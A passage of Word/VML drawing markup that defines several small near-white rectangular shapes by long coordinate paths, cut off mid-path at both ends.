309,4960,2309,4962,2309,4965,2309,4967,2309,4970,2309,4972,2309,4975,2309,4977,2309,4980,2309,4983,2309,4986,2309,4989,2309,4992,2309,4995,2309,4998,2309,5001,2309,5005,2309,5008,2309,5011,2309,5015,2309,5018,2309,5022,2309,5026,2309,5030,2309,5033,2309,5037,2309,5041,2309,5046,2309,5050,2309,5054,2309,5058,2309,5063,2309,5067,2309,5072,2309,5077,2309,5082,2309,5086,2309,5091,2309,5096,2309,5102,2309,5107,2309,5112,2309,5118,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2309,5123,2308,5123,2308,5123,2308,5123,2308,5123,2308,5123,2308,5123,2308,5123,2308,5123,2307,5123,2307,5123,2307,5123,2307,5123,2307,5123,2306,5123,2306,5123,2306,5123,2306,5123,2305,5123,2305,5123,2305,5123,2304,5123,2304,5123,2304,5123,2303,5123,2303,5123,2302,5123,2302,5123,2302,5123,2301,5123,2301,5123,2300,5123,2300,5123,2299,5123,2298,5123,2298,5123,2297,5123,2297,5123,2296,5123,2295,5123,2295,5123,2294,5123,2293,5123,2292,5123,2292,5123,2291,5123,2290,5123,2289,5123,2288,5123,2287,5123,2286,5123,2285,5123,2284,5123,2283,5123,2282,5123,2281,5123,2280,5123,2279,5123,2278,5123,2276,5123,2275,5123,2274,5123,2273,5123,2271,5123,2270,5123,2269,5123,2267,5123,2266,5123,2264,5123,2263,5123,2261,5123,2260,5123,2258,5123,2256,5123,2255,5123,2253,5123,2251,5123,2249,5123,2248,5123,2246,5123,2244,5123,2242,5123,2240,5123,2238,5123,2236,5123,2234,5123,2232,5123,2229,5123,2227,5123,2225,5123,2223,5123,2220,5123,2218,5123,2216,5123,2213,5123,2211,5123,2208,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5123,2205,5122,2205,5122,2205,5122,2205,5122,2205,5122,2205,5122,2205,5122,2205,5121,2205,5121,2205,5121,2205,5121,2205,5120,2205,5120,2205,5120,2205,5119,2205,5119,2205,5118,2205,5118,2205,5118,2205,5117,2205,5116,2205,5116,2205,5115,2205,5115,2205,5114,2205,5113,2205,5113,2205,5112,2205,5111,2205,5110,2205,5110,2205,5109,2205,5108,2205,5107,2205,5106,2205,5105,2205,5104,2205,5103,2205,5101,2205,5100,2205,5099,2205,5098,2205,5096,2205,5095,2205,5093,2205,5092,2205,5090,2205,5089,2205,5087,2205,5086,2205,5084,2205,5082,2205,5080,2205,5078,2205,5076,2205,5074,2205,5072,2205,5070,2205,5068,2205,5066,2205,5063,2205,5061,2205,5059,2205,5056,2205,5054,2205,5051,2205,5048,2205,5046,2205,5043,2205,5040,2205,5037,2205,5034,2205,5031,2205,5028,2205,5025,2205,5021,2205,5018,2205,5014,2205,5011,2205,5007,2205,5004,2205,5000,2205,4996,2205,4992,2205,4988,2205,4984,2205,4980,2205,4976,2205,4972,2205,4967,2205,4963,2205,4958,2205,4954,2205,4949,2205,4944,2205,4939,2205,4934,2205,4929,2205,4924,2205,4919,2205,4914,2205,4908,2205,4903e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:244.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,4890" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:4890;width:110;height:230" coordorigin="2610,4890" coordsize="110,230" path="m2620,4903l2620,4903,2620,4903,2620,4903,2620,4903,2620,4903,2620,4903,2620,4903,2620,4903,2620,4903,2620,4903,2620,4903,2620,4903,2621,4903,2621,4903,2621,4903,2621,4903,2621,4903,2621,4903,2621,4903,2621,4903,2621,4903,2621,4903,2621,4903,2621,4903,2621,4903,2621,4903,2621,4903,2622,4903,2622,4903,2622,4903,2622,4903,2622,4903,2622,4903,2623,4903,2623,4903,2623,4903,2623,4903,2624,4903,2624,4903,2624,4903,2624,4903,2625,4903,2625,4903,2625,4903,2626,4903,2626,4903,2626,4903,2627,4903,2627,4903,2628,4903,2628,4903,2629,4903,2629,4903,2630,4903,2630,4903,2631,4903,2631,4903,2632,4903,2632,4903,2633,4903,2634,4903,2634,4903,2635,4903,2636,4903,2637,4903,2637,4903,2638,4903,2639,4903,2640,4903,2641,4903,2642,4903,2642,4903,2643,4903,2644,4903,2645,4903,2646,4903,2647,4903,2649,4903,2650,4903,2651,4903,2652,4903,2653,4903,2654,4903,2656,4903,2657,4903,2658,4903,2660,4903,2661,4903,2662,4903,2664,4903,2665,4903,2667,4903,2668,4903,2670,4903,2672,4903,2673,4903,2675,4903,2677,4903,2678,4903,2680,4903,2682,4903,2684,4903,2686,4903,2688,4903,2690,4903,2692,4903,2694,4903,2696,4903,2698,4903,2700,4903,2702,4903,2705,4903,2707,4903,2709,4903,2712,4903,2714,4903,2717,4903,2719,4903,2722,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4903,2724,4904,2724,4904,2724,4904,2724,4904,2724,4904,2724,4904,2724,4905,2724,4905,2724,4905,2724,4906,2724,4906,2724,4906,2724,4907,2724,4907,2724,4907,2724,4908,2724,4908,2724,4909,2724,4909,2724,4910,2724,4910,2724,4911,2724,4912,2724,4912,2724,4913,2724,4914,2724,4915,2724,4915,2724,4916,2724,4917,2724,4918,2724,4919,2724,4920,2724,4921,2724,4922,2724,4923,2724,4924,2724,4926,2724,4927,2724,4928,2724,4930,2724,4931,2724,4932,2724,4934,2724,4935,2724,4937,2724,4939,2724,4940,2724,4942,2724,4944,2724,4946,2724,4948,2724,4949,2724,4951,2724,4954,2724,4956,2724,4958,2724,4960,2724,4962,2724,4965,2724,4967,2724,4970,2724,4972,2724,4975,2724,4977,2724,4980,2724,4983,2724,4986,2724,4989,2724,4992,2724,4995,2724,4998,2724,5001,2724,5005,2724,5008,2724,5011,2724,5015,2724,5018,2724,5022,2724,5026,2724,5030,2724,5033,2724,5037,2724,5041,2724,5046,2724,5050,2724,5054,2724,5058,2724,5063,2724,5067,2724,5072,2724,5077,2724,5082,2724,5086,2724,5091,2724,5096,2724,5102,2724,5107,2724,5112,2724,5118,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2724,5123,2723,5123,2723,5123,2723,5123,2723,5123,2723,5123,2723,5123,2723,5123,2722,5123,2722,5123,2722,5123,2722,5123,2722,5123,2722,5123,2721,5123,2721,5123,2721,5123,2721,5123,2720,5123,2720,5123,2720,5123,2719,5123,2719,5123,2719,5123,2718,5123,2718,5123,2717,5123,2717,5123,2716,5123,2716,5123,2716,5123,2715,5123,2714,5123,2714,5123,2713,5123,2713,5123,2712,5123,2712,5123,2711,5123,2710,5123,2709,5123,2709,5123,2708,5123,2707,5123,2706,5123,2706,5123,2705,5123,2704,5123,2703,5123,2702,5123,2701,5123,2700,5123,2699,5123,2698,5123,2697,5123,2696,5123,2695,5123,2694,5123,2693,5123,2691,5123,2690,5123,2689,5123,2688,5123,2686,5123,2685,5123,2684,5123,2682,5123,2681,5123,2679,5123,2678,5123,2676,5123,2675,5123,2673,5123,2671,5123,2670,5123,2668,5123,2666,5123,2664,5123,2663,5123,2661,5123,2659,5123,2657,5123,2655,5123,2653,5123,2651,5123,2649,5123,2647,5123,2644,5123,2642,5123,2640,5123,2638,5123,2635,5123,2633,5123,2631,5123,2628,5123,2626,5123,2623,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5123,2620,5122,2620,5122,2620,5122,2620,5122,2620,5122,2620,5122,2620,5122,2620,5121,2620,5121,2620,5121,2620,5121,2620,5120,2620,5120,2620,5120,2620,5119,2620,5119,2620,5118,2620,5118,2620,5118,2620,5117,2620,5116,2620,5116,2620,5115,2620,5115,2620,5114,2620,5113,2620,5113,2620,5112,2620,5111,2620,5110,2620,5110,2620,5109,2620,5108,2620,5107,2620,5106,2620,5105,2620,5104,2620,5103,2620,5101,2620,5100,2620,5099,2620,5098,2620,5096,2620,5095,2620,5093,2620,5092,2620,5090,2620,5089,2620,5087,2620,5086,2620,5084,2620,5082,2620,5080,2620,5078,2620,5076,2620,5074,2620,5072,2620,5070,2620,5068,2620,5066,2620,5063,2620,5061,2620,5059,2620,5056,2620,5054,2620,5051,2620,5048,2620,5046,2620,5043,2620,5040,2620,5037,2620,5034,2620,5031,2620,5028,2620,5025,2620,5021,2620,5018,2620,5014,2620,5011,2620,5007,2620,5004,2620,5000,2620,4996,2620,4992,2620,4988,2620,4984,2620,4980,2620,4976,2620,4972,2620,4967,2620,4963,2620,4958,2620,4954,2620,4949,2620,4944,2620,4939,2620,4934,2620,4929,2620,4924,2620,4919,2620,4914,2620,4908,2620,4903e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:271.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,5430" coordsize="110,230">
        <v:shape style="position:absolute;left:2190;top:5430;width:110;height:230" coordorigin="2190,5430" coordsize="110,230" path="m2205,5447l2205,5447,2205,5447,2205,5447,2205,5447,2205,5447,2205,5447,2205,5447,2205,5447,2205,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2206,5447,2207,5447,2207,5447,2207,5447,2207,5447,2207,5447,2207,5447,2207,5447,2208,5447,2208,5447,2208,5447,2208,5447,2209,5447,2209,5447,2209,5447,2209,5447,2210,5447,2210,5447,2210,5447,2211,5447,2211,5447,2211,5447,2212,5447,2212,5447,2213,5447,2213,5447,2214,5447,2214,5447,2215,5447,2215,5447,2216,5447,2216,5447,2217,5447,2217,5447,2218,5447,2219,5447,2219,5447,2220,5447,2221,5447,2222,5447,2222,5447,2223,5447,2224,5447,2225,5447,2226,5447,2227,5447,2227,5447,2228,5447,2229,5447,2230,5447,2231,5447,2232,5447,2234,5447,2235,5447,2236,5447,2237,5447,2238,5447,2239,5447,2241,5447,2242,5447,2243,5447,2245,5447,2246,5447,2247,5447,2249,5447,2250,5447,2252,5447,2253,5447,2255,5447,2257,5447,2258,5447,2260,5447,2262,5447,2263,5447,2265,5447,2267,5447,2269,5447,2271,5447,2273,5447,2275,5447,2277,5447,2279,5447,2281,5447,2283,5447,2285,5447,2287,5447,2290,5447,2292,5447,2294,5447,2297,5447,2299,5447,2302,5447,2304,5447,2307,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5447,2309,5448,2309,5448,2309,5448,2309,5448,2309,5448,2309,5448,2309,5448,2309,5448,2309,5448,2309,5449,2309,5449,2309,5449,2309,5449,2309,5449,2309,5450,2309,5450,2309,5450,2309,5450,2309,5451,2309,5451,2309,5452,2309,5452,2309,5452,2309,5453,2309,5453,2309,5454,2309,5454,2309,5455,2309,5456,2309,5456,2309,5457,2309,5458,2309,5458,2309,5459,2309,5460,2309,5461,2309,5462,2309,5463,2309,5464,2309,5465,2309,5466,2309,5467,2309,5468,2309,5469,2309,5470,2309,5472,2309,5473,2309,5474,2309,5476,2309,5477,2309,5478,2309,5480,2309,5482,2309,5483,2309,5485,2309,5487,2309,5488,2309,5490,2309,5492,2309,5494,2309,5496,2309,5498,2309,5500,2309,5502,2309,5505,2309,5507,2309,5509,2309,5512,2309,5514,2309,5517,2309,5519,2309,5522,2309,5525,2309,5528,2309,5531,2309,5533,2309,5536,2309,5540,2309,5543,2309,5546,2309,5549,2309,5553,2309,5556,2309,5559,2309,5563,2309,5567,2309,5570,2309,5574,2309,5578,2309,5582,2309,5586,2309,5590,2309,5594,2309,5599,2309,5603,2309,5608,2309,5612,2309,5617,2309,5621,2309,5626,2309,5631,2309,5636,2309,5641,2309,5646,2309,5651,2309,5657,2309,5662,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2309,5668,2308,5668,2308,5668,2308,5668,2308,5668,2308,5668,2308,5668,2308,5668,2308,5668,2307,5668,2307,5668,2307,5668,2307,5668,2307,5668,2306,5668,2306,5668,2306,5668,2306,5668,2305,5668,2305,5668,2305,5668,2304,5668,2304,5668,2304,5668,2303,5668,2303,5668,2302,5668,2302,5668,2302,5668,2301,5668,2301,5668,2300,5668,2300,5668,2299,5668,2298,5668,2298,5668,2297,5668,2297,5668,2296,5668,2295,5668,2295,5668,2294,5668,2293,5668,2292,5668,2292,5668,2291,5668,2290,5668,2289,5668,2288,5668,2287,5668,2286,5668,2285,5668,2284,5668,2283,5668,2282,5668,2281,5668,2280,5668,2279,5668,2278,5668,2276,5668,2275,5668,2274,5668,2273,5668,2271,5668,2270,5668,2269,5668,2267,5668,2266,5668,2264,5668,2263,5668,2261,5668,2260,5668,2258,5668,2256,5668,2255,5668,2253,5668,2251,5668,2249,5668,2248,5668,2246,5668,2244,5668,2242,5668,2240,5668,2238,5668,2236,5668,2234,5668,2232,5668,2229,5668,2227,5668,2225,5668,2223,5668,2220,5668,2218,5668,2216,5668,2213,5668,2211,5668,2208,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5668,2205,5667,2205,5667,2205,5667,2205,5667,2205,5667,2205,5667,2205,5667,2205,5667,2205,5667,2205,5666,2205,5666,2205,5666,2205,5666,2205,5665,2205,5665,2205,5665,2205,5665,2205,5664,2205,5664,2205,5663,2205,5663,2205,5663,2205,5662,2205,5662,2205,5661,2205,5661,2205,5660,2205,5659,2205,5659,2205,5658,2205,5657,2205,5657,2205,5656,2205,5655,2205,5654,2205,5653,2205,5652,2205,5651,2205,5650,2205,5649,2205,5648,2205,5647,2205,5646,2205,5645,2205,5644,2205,5642,2205,5641,2205,5639,2205,5638,2205,5637,2205,5635,2205,5633,2205,5632,2205,5630,2205,5628,2205,5627,2205,5625,2205,5623,2205,5621,2205,5619,2205,5617,2205,5615,2205,5613,2205,5610,2205,5608,2205,5606,2205,5603,2205,5601,2205,5598,2205,5596,2205,5593,2205,5590,2205,5587,2205,5585,2205,5582,2205,5579,2205,5576,2205,5572,2205,5569,2205,5566,2205,5563,2205,5559,2205,5556,2205,5552,2205,5548,2205,5545,2205,5541,2205,5537,2205,5533,2205,5529,2205,5525,2205,5521,2205,5516,2205,5512,2205,5507,2205,5503,2205,5498,2205,5494,2205,5489,2205,5484,2205,5479,2205,5474,2205,5469,2205,5464,2205,5458,2205,5453,2205,5447e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:271.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,5430" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:5430;width:110;height:230" coordorigin="2610,5430" coordsize="110,230" path="m2620,5447l2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2620,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2621,5447,2622,5447,2622,5447,2622,5447,2622,5447,2622,5447,2622,5447,2623,5447,2623,5447,2623,5447,2623,5447,2624,5447,2624,5447,2624,5447,2624,5447,2625,5447,2625,5447,2625,5447,2626,5447,2626,5447,2626,5447,2627,5447,2627,5447,2628,5447,2628,5447,2629,5447,2629,5447,2630,5447,2630,5447,2631,5447,2631,5447,2632,5447,2632,5447,2633,5447,2634,5447,2634,5447,2635,5447,2636,5447,2637,5447,2637,5447,2638,5447,2639,5447,2640,5447,2641,5447,2642,5447,2642,5447,2643,5447,2644,5447,2645,5447,2646,5447,2647,5447,2649,5447,2650,5447,2651,5447,2652,5447,2653,5447,2654,5447,2656,5447,2657,5447,2658,5447,2660,5447,2661,5447,2662,5447,2664,5447,2665,5447,2667,5447,2668,5447,2670,5447,2672,5447,2673,5447,2675,5447,2677,5447,2678,5447,2680,5447,2682,5447,2684,5447,2686,5447,2688,5447,2690,5447,2692,5447,2694,5447,2696,5447,2698,5447,2700,5447,2702,5447,2705,5447,2707,5447,2709,5447,2712,5447,2714,5447,2717,5447,2719,5447,2722,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5447,2724,5448,2724,5448,2724,5448,2724,5448,2724,5448,2724,5448,2724,5448,2724,5448,2724,5448,2724,5449,2724,5449,2724,5449,2724,5449,2724,5449,2724,5450,2724,5450,2724,5450,2724,5450,2724,5451,2724,5451,2724,5452,2724,5452,2724,5452,2724,5453,2724,5453,2724,5454,2724,5454,2724,5455,2724,5456,2724,5456,2724,5457,2724,5458,2724,5458,2724,5459,2724,5460,2724,5461,2724,5462,2724,5463,2724,5464,2724,5465,2724,5466,2724,5467,2724,5468,2724,5469,2724,5470,2724,5472,2724,5473,2724,5474,2724,5476,2724,5477,2724,5478,2724,5480,2724,5482,2724,5483,2724,5485,2724,5487,2724,5488,2724,5490,2724,5492,2724,5494,2724,5496,2724,5498,2724,5500,2724,5502,2724,5505,2724,5507,2724,5509,2724,5512,2724,5514,2724,5517,2724,5519,2724,5522,2724,5525,2724,5528,2724,5531,2724,5533,2724,5536,2724,5540,2724,5543,2724,5546,2724,5549,2724,5553,2724,5556,2724,5559,2724,5563,2724,5567,2724,5570,2724,5574,2724,5578,2724,5582,2724,5586,2724,5590,2724,5594,2724,5599,2724,5603,2724,5608,2724,5612,2724,5617,2724,5621,2724,5626,2724,5631,2724,5636,2724,5641,2724,5646,2724,5651,2724,5657,2724,5662,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2724,5668,2723,5668,2723,5668,2723,5668,2723,5668,2723,5668,2723,5668,2723,5668,2722,5668,2722,5668,2722,5668,2722,5668,2722,5668,2722,5668,2721,5668,2721,5668,2721,5668,2721,5668,2720,5668,2720,5668,2720,5668,2719,5668,2719,5668,2719,5668,2718,5668,2718,5668,2717,5668,2717,5668,2716,5668,2716,5668,2716,5668,2715,5668,2714,5668,2714,5668,2713,5668,2713,5668,2712,5668,2712,5668,2711,5668,2710,5668,2709,5668,2709,5668,2708,5668,2707,5668,2706,5668,2706,5668,2705,5668,2704,5668,2703,5668,2702,5668,2701,5668,2700,5668,2699,5668,2698,5668,2697,5668,2696,5668,2695,5668,2694,5668,2693,5668,2691,5668,2690,5668,2689,5668,2688,5668,2686,5668,2685,5668,2684,5668,2682,5668,2681,5668,2679,5668,2678,5668,2676,5668,2675,5668,2673,5668,2671,5668,2670,5668,2668,5668,2666,5668,2664,5668,2663,5668,2661,5668,2659,5668,2657,5668,2655,5668,2653,5668,2651,5668,2649,5668,2647,5668,2644,5668,2642,5668,2640,5668,2638,5668,2635,5668,2633,5668,2631,5668,2628,5668,2626,5668,2623,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5668,2620,5667,2620,5667,2620,5667,2620,5667,2620,5667,2620,5667,2620,5667,2620,5667,2620,5667,2620,5666,2620,5666,2620,5666,2620,5666,2620,5665,2620,5665,2620,5665,2620,5665,2620,5664,2620,5664,2620,5663,2620,5663,2620,5663,2620,5662,2620,5662,2620,5661,2620,5661,2620,5660,2620,5659,2620,5659,2620,5658,2620,5657,2620,5657,2620,5656,2620,5655,2620,5654,2620,5653,2620,5652,2620,5651,2620,5650,2620,5649,2620,5648,2620,5647,2620,5646,2620,5645,2620,5644,2620,5642,2620,5641,2620,5639,2620,5638,2620,5637,2620,5635,2620,5633,2620,5632,2620,5630,2620,5628,2620,5627,2620,5625,2620,5623,2620,5621,2620,5619,2620,5617,2620,5615,2620,5613,2620,5610,2620,5608,2620,5606,2620,5603,2620,5601,2620,5598,2620,5596,2620,5593,2620,5590,2620,5587,2620,5585,2620,5582,2620,5579,2620,5576,2620,5572,2620,5569,2620,5566,2620,5563,2620,5559,2620,5556,2620,5552,2620,5548,2620,5545,2620,5541,2620,5537,2620,5533,2620,5529,2620,5525,2620,5521,2620,5516,2620,5512,2620,5507,2620,5503,2620,5498,2620,5494,2620,5489,2620,5484,2620,5479,2620,5474,2620,5469,2620,5464,2620,5458,2620,5453,2620,5447e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:299.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,5990" coordsize="110,230">
        <v:shape style="position:absolute;left:2190;top:5990;width:110;height:230" coordorigin="2190,5990" coordsize="110,230" path="m2205,6005l2205,6005,2205,6005,2205,6005,2205,6005,2205,6005,2205,6005,2205,6005,2205,6005,2205,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2206,6005,2207,6005,2207,6005,2207,6005,2207,6005,2207,6005,2207,6005,2207,6005,2208,6005,2208,6005,2208,6005,2208,6005,2209,6005,2209,6005,2209,6005,2209,6005,2210,6005,2210,6005,2210,6005,2211,6005,2211,6005,2211,6005,2212,6005,2212,6005,2213,6005,2213,6005,2214,6005,2214,6005,2215,6005,2215,6005,2216,6005,2216,6005,2217,6005,2217,6005,2218,6005,2219,6005,2219,6005,2220,6005,2221,6005,2222,6005,2222,6005,2223,6005,2224,6005,2225,6005,2226,6005,2227,6005,2227,6005,2228,6005,2229,6005,2230,6005,2231,6005,2232,6005,2234,6005,2235,6005,2236,6005,2237,6005,2238,6005,2239,6005,2241,6005,2242,6005,2243,6005,2245,6005,2246,6005,2247,6005,2249,6005,2250,6005,2252,6005,2253,6005,2255,6005,2257,6005,2258,6005,2260,6005,2262,6005,2263,6005,2265,6005,2267,6005,2269,6005,2271,6005,2273,6005,2275,6005,2277,6005,2279,6005,2281,6005,2283,6005,2285,6005,2287,6005,2290,6005,2292,6005,2294,6005,2297,6005,2299,6005,2302,6005,2304,6005,2307,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6005,2309,6006,2309,6006,2309,6006,2309,6006,2309,6006,2309,6006,2309,6006,2309,6007,2309,6007,2309,6007,2309,6007,2309,6008,2309,6008,2309,6008,2309,6009,2309,6009,2309,6010,2309,6010,2309,6011,2309,6011,2309,6012,2309,6012,2309,6013,2309,6013,2309,6014,2309,6015,2309,6015,2309,6016,2309,6017,2309,6018,2309,6018,2309,6019,2309,6020,2309,6021,2309,6022,2309,6023,2309,6024,2309,6025,2309,6027,2309,6028,2309,6029,2309,6030,2309,6032,2309,6033,2309,6035,2309,6036,2309,6038,2309,6039,2309,6041,2309,6043,2309,6044,2309,6046,2309,6048,2309,6050,2309,6052,2309,6054,2309,6056,2309,6058,2309,6060,2309,6062,2309,6065,2309,6067,2309,6069,2309,6072,2309,6074,2309,6077,2309,6080,2309,6082,2309,6085,2309,6088,2309,6091,2309,6094,2309,6097,2309,6100,2309,6103,2309,6107,2309,6110,2309,6114,2309,6117,2309,6121,2309,6124,2309,6128,2309,6132,2309,6136,2309,6140,2309,6144,2309,6148,2309,6152,2309,6156,2309,6161,2309,6165,2309,6170,2309,6174,2309,6179,2309,6184,2309,6189,2309,6194,2309,6199,2309,6204,2309,6209,2309,6214,2309,6220,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2309,6225,2308,6225,2308,6225,2308,6225,2308,6225,2308,6225,2308,6225,2308,6225,2308,6225,2307,6225,2307,6225,2307,6225,2307,6225,2307,6225,2306,6225,2306,6225,2306,6225,2306,6225,2305,6225,2305,6225,2305,6225,2304,6225,2304,6225,2304,6225,2303,6225,2303,6225,2302,6225,2302,6225,2302,6225,2301,6225,2301,6225,2300,6225,2300,6225,2299,6225,2298,6225,2298,6225,2297,6225,2297,6225,2296,6225,2295,6225,2295,6225,2294,6225,2293,6225,2292,6225,2292,6225,2291,6225,2290,6225,2289,6225,2288,6225,2287,6225,2286,6225,2285,6225,2284,6225,2283,6225,2282,6225,2281,6225,2280,6225,2279,6225,2278,6225,2276,6225,2275,6225,2274,6225,2273,6225,2271,6225,2270,6225,2269,6225,2267,6225,2266,6225,2264,6225,2263,6225,2261,6225,2260,6225,2258,6225,2256,6225,2255,6225,2253,6225,2251,6225,2249,6225,2248,6225,2246,6225,2244,6225,2242,6225,2240,6225,2238,6225,2236,6225,2234,6225,2232,6225,2229,6225,2227,6225,2225,6225,2223,6225,2220,6225,2218,6225,2216,6225,2213,6225,2211,6225,2208,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6225,2205,6224,2205,6224,2205,6224,2205,6224,2205,6224,2205,6224,2205,6223,2205,6223,2205,6223,2205,6222,2205,6222,2205,6222,2205,6221,2205,6221,2205,6221,2205,6220,2205,6220,2205,6219,2205,6219,2205,6218,2205,6218,2205,6217,2205,6216,2205,6216,2205,6215,2205,6214,2205,6213,2205,6213,2205,6212,2205,6211,2205,6210,2205,6209,2205,6208,2205,6207,2205,6206,2205,6205,2205,6204,2205,6202,2205,6201,2205,6200,2205,6198,2205,6197,2205,6196,2205,6194,2205,6193,2205,6191,2205,6189,2205,6188,2205,6186,2205,6184,2205,6182,2205,6180,2205,6179,2205,6177,2205,6174,2205,6172,2205,6170,2205,6168,2205,6166,2205,6163,2205,6161,2205,6158,2205,6156,2205,6153,2205,6151,2205,6148,2205,6145,2205,6142,2205,6139,2205,6136,2205,6133,2205,6130,2205,6127,2205,6123,2205,6120,2205,6117,2205,6113,2205,6110,2205,6106,2205,6102,2205,6098,2205,6095,2205,6091,2205,6087,2205,6082,2205,6078,2205,6074,2205,6070,2205,6065,2205,6061,2205,6056,2205,6051,2205,6046,2205,6042,2205,6037,2205,6032,2205,6026,2205,6021,2205,6016,2205,6010,2205,6005e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:299.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,5990" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:5990;width:110;height:230" coordorigin="2610,5990" coordsize="110,230" path="m2620,6005l2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2620,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2621,6005,2622,6005,2622,6005,2622,6005,2622,6005,2622,6005,2622,6005,2623,6005,2623,6005,2623,6005,2623,6005,2624,6005,2624,6005,2624,6005,2624,6005,2625,6005,2625,6005,2625,6005,2626,6005,2626,6005,2626,6005,2627,6005,2627,6005,2628,6005,2628,6005,2629,6005,2629,6005,2630,6005,2630,6005,2631,6005,2631,6005,2632,6005,2632,6005,2633,6005,2634,6005,2634,6005,2635,6005,2636,6005,2637,6005,2637,6005,2638,6005,2639,6005,2640,6005,2641,6005,2642,6005,2642,6005,2643,6005,2644,6005,2645,6005,2646,6005,2647,6005,2649,6005,2650,6005,2651,6005,2652,6005,2653,6005,2654,6005,2656,6005,2657,6005,2658,6005,2660,6005,2661,6005,2662,6005,2664,6005,2665,6005,2667,6005,2668,6005,2670,6005,2672,6005,2673,6005,2675,6005,2677,6005